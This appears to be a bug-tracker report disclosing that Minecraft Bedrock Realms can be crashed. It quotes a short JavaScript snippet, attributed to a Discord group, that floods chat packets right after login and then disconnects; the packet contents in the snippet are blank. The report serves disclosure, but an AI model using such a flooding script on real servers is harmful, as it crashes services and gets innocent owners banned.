Realm can be crashed with code (provided)
This code is being used to crash realms.
This is also causing the owners of the realm to get communication banned on xbox because of the chat spam
Source is from discord called "crashary 2" a rival to the people that mainly Use this "Anti PTW movement" (discord.gg/antip2w)
client.on("play_status", (packet) => {
if (packet.status !== "login_success") return;
let interval = setInterval(() => {
client.write("text",
);
}, 0);
setTimeout(() =>
{ client.disconnect(); clearInterval(interval); }, 75);
})
2024-03-21, 03:32 AM
2024-07-12, 07:27 PM
2024-07-12, 07:27 PM
0
0
1265828
1.20.71 (Bedrock), 1.20.72 (Bedrock)
-